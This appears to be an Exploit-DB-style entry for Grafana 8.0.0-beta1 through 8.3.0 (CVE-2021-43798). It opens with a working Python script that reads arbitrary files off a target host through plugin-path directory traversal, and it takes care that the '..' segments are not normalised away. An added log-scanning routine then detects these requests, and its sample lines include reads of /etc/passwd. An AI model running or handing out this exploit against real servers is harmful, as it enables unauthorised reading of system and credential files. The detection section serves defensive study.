# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
# Date: 08/12/2021
# Exploit Author: s1gh
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Debian 10
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import argparse
import sys
from random import choice

# Plugin ids bundled with Grafana; the vulnerable handler serves files relative
# to /public/plugins/<plugin>/ without rejecting ".." segments.
plugin_list = [
    "alertlist", "annolist", "barchart", "bargauge", "candlestick", "cloudwatch",
    "dashlist", "elasticsearch", "gauge", "geomap", "gettingstarted",
    "grafana-azure-monitor-datasource", "graph", "heatmap", "histogram", "influxdb",
    "jaeger", "logs", "loki", "mssql", "mysql", "news", "nodeGraph", "opentsdb",
    "piechart", "pluginlist", "postgres", "prometheus", "stackdriver", "stat",
    "state-timeline", "status-history", "table", "table-old", "tempo", "testdata",
    "text", "timeseries", "welcome", "zipkin"
]


def exploit(args):
    s = requests.Session()
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
    }

    while True:
        file_to_read = input('Read file > ')

        try:
            url = args.host + '/public/plugins/' + choice(plugin_list) \
                + '/../../../../../../../../../../../../..' + file_to_read
            req = requests.Request(method='GET', url=url, headers=headers)
            prep = req.prepare()
            # Reassign the URL after prepare() so requests does not normalise
            # away the ".." segments before sending.
            prep.url = url
            r = s.send(prep, verify=False, timeout=3)

            if 'Plugin file not found' in r.text:
                print('[-] File not found\n')
            else:
                if r.status_code == 200:
                    print(r.text)
                else:
                    print('[-] Something went wrong.')
                    return
        except requests.exceptions.ConnectTimeout:
            print('[-] Request timed out. Please check your host settings.\n')
            return
        except Exception:
            pass


def main():
    parser = argparse.ArgumentParser(
        description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
    parser.add_argument('-H', dest='host', required=True, help="Target host")
    args = parser.parse_args()

    try:
        exploit(args)
    except KeyboardInterrupt:
        return


if __name__ == '__main__':
    main()
    sys.exit(0)
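From the defender's side, the request shape above (a `/public/plugins/<plugin>/` path followed by `..` segments) is straightforward to spot in web-server or reverse-proxy access logs, provided the raw, un-normalised path is logged. The following detection routine is an added example written for this page, not part of the exploit or of Grafana; the log lines are constructed and the log format assumed is the common combined format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not captured from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Dec/2021:10:01:02 +0000] "GET /public/plugins/mysql/../../../../../../../../etc/passwd HTTP/1.1" 200 1842
10.0.0.5 - - [08/Dec/2021:10:01:09 +0000] "GET /public/plugins/loki/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hostname HTTP/1.1" 200 12
10.0.0.7 - - [08/Dec/2021:10:02:00 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 20311
10.0.0.8 - - [08/Dec/2021:10:02:30 +0000] "GET /api/dashboards/home HTTP/1.1" 200 512
"""

# Combined-log-format request line: source, method, raw path, status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLUGIN_PATH_RE = re.compile(r'^/public/plugins/[^/]+/(?P<rest>.*)$')


def is_plugin_traversal(raw_path: str) -> bool:
    """True if a raw request path targets /public/plugins/<plugin>/ and contains
    a '..' segment after URL-decoding, the pattern CVE-2021-43798 relies on.
    The raw path must be inspected: a normalising proxy or log pipeline would
    collapse the '..' segments and hide the traversal."""
    path = raw_path.split('?', 1)[0]
    decoded = unquote(unquote(path))  # tolerate single and double encoding
    m = PLUGIN_PATH_RE.match(decoded)
    if not m:
        return False
    return any(seg == '..' for seg in m.group('rest').split('/'))


def find_traversal_attempts(log_text: str) -> list:
    """Scan access-log text; return (source, status, decoded_path) per hit.
    A 200 status on a hit means the read most likely succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_plugin_traversal(m.group('path')):
            hits.append((m.group('src'), int(m.group('status')),
                         unquote(unquote(m.group('path')))))
    return hits


if __name__ == '__main__':
    for src, status, path in find_traversal_attempts(SAMPLE_LOG):
        print(f'[!] {src} status={status} path={path}')
```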